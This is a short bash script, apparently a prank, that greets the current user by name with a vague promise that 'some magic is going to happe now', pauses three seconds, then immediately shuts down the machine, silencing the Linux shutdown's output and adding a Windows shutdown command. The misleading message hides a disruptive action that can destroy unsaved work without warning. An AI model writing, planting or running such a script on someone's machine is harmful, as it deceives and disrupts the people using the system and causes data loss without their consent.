#!/bin/env bash 
echo "Hi!! $(whoami) , some magic is going to happe now SIT TIGHTTTTTTT!!!!!!"
sleep 3 
shutdown now 2>/dev/null 1>/dev/null  # SORRY LINUX USER
shutdown -s -t 0 # SORRY WINDOWS USER :(
